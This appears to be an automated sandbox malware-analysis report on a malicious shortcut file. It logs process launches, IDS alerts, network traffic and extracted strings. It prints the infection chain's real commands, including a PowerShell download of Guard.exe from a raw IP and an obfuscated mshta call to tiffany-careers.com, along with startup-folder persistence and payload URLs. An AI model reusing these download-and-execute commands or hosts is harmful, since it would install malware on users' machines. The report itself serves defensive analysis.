Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\dqcwif.exe" , ParentImage: C:\Users\user\AppData\Roaming\dqcwif.exe, ParentProcessId: 4412, ParentProcessName: dqcwif.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8156, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8900, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 4148, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325'), ProcessId: 5412, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6308, ProcessName: svchost.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T08:39:19.508617+010020264341A Network Trojan was detected147.45.49.155443192.168.2.649719TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T08:39:33.055367+010028033053Unknown Traffic192.168.2.649762147.45.49.155443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Roaming\dqcwif.exeReversingLabs: Detection: 65%
Source: 7A2lfjTYNf.lnkVirustotal: Detection: 25%Perma Link
Source: 7A2lfjTYNf.lnkReversingLabs: Detection: 21%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2212037482.000001E84F29A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212152463.000001E84F205000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2211529393.000001E853230000.00000004.00000020.00020000.00000000.sdmp, ghepduy1325[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2212037482.000001E84F29A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212152463.000001E84F205000.00000004.00000020.00020000.00000000.sdmp, ghepduy1325[1].6.dr
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF6B5B9C7C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF6B5B9B7C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF6B5BA72A8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA71F4 FindFirstFileW,FindClose,19_2_00007FF6B5BA71F4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF6B5B9BC70
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF6B5BAA874
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF6B5BAA4F8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA6428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF6B5BA6428
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF6B5BAA350
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B62F50 FindFirstFileExW,19_2_00007FF6B5B62F50

Networking

barindex
Source: Network trafficSuricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.6:49719
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 Dec 2024 07:39:39 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 16 Dec 2024 07:33:56 GMTETag: "da2a8-6295e34064898"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dqcwif.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /VmnWBYrzn.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49762 -> 147.45.49.155:443
Source: global trafficHTTP traffic detected: GET /ghepduy1325 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /IAFkh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAE87C InternetReadFile,19_2_00007FF6B5BAE87C
Source: global trafficHTTP traffic detected: GET /ghepduy1325 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dqcwif.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /IAFkh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /VmnWBYrzn.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000018.00000002.2503038177.000002035DA51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035DFFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: dqcwif.exe, 00000013.00000002.2438580826.00000281D2B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/IAFkhV
Source: powershell.exe, 00000018.00000002.2503038177.000002035DA51000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.19.drString found in binary or memory: http://139.99.188.124/VmnWBYrzn.txt
Source: powershell.exe, 00000018.00000002.2503038177.000002035E2C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2174205142.000002370001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C9291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 0000001C.00000000.2484845641.00000000006B9000.00000002.00000001.01000000.00000010.sdmp, Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000021.00000000.2641644438.0000000000E59000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.17.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.2174205142.000002370004A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174205142.000002370005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C9291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2503038177.000002035D821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000008.00000003.2204354185.000001B4F1990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.2503038177.000002035DF12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.co
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: powershell.exe, 00000009.00000002.2387052850.000001F2C94BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Job_Description.pdf
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/d
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dq
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqc
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcw
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwi
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwif
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwif.
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwif.e
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwif.ex
Source: powershell.exe, 00000009.00000002.2387052850.000001F2CE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/dqcwif.exe
Source: powershell.exe, 00000005.00000002.2174205142.00000237001E2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212152463.000001E84F205000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212094517.000001E04C7AC000.00000004.00000020.00020000.00000000.sdmp, 7A2lfjTYNf.lnkString found in binary or memory: https://tiffany-careers.com/ghepduy1325
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghepduy1325$global:?
Source: powershell.exe, 00000005.00000002.2175937945.0000023772365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghepduy13256
